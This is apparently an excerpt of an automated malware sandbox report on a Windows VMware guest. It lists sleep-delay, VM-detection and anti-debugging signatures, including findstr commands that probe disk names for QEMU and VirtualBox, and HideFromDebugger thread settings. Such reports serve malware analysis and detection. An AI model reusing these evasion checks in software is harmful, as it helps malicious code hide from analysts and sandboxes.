Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894 FindFirstFileExW,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894 FindFirstFileExW,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894 FindFirstFileExW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2y
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: VMware
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: Microsoft-Windows-WER-PayloadHealth%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: lsass.exe, 00000028.00000002.3004375216.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454613011.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.2984423771.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2461883353.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2487807964.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.2985218282.000001795302B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2984681967.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002E.00000000.2491864089.000002295CE2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2505327301.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3006995686.000001845AC3F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000032.00000000.2527082224.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
Source: svchost.exe, 00000029.00000000.2462217296.000002A660662000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000039.00000002.2984538693.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,
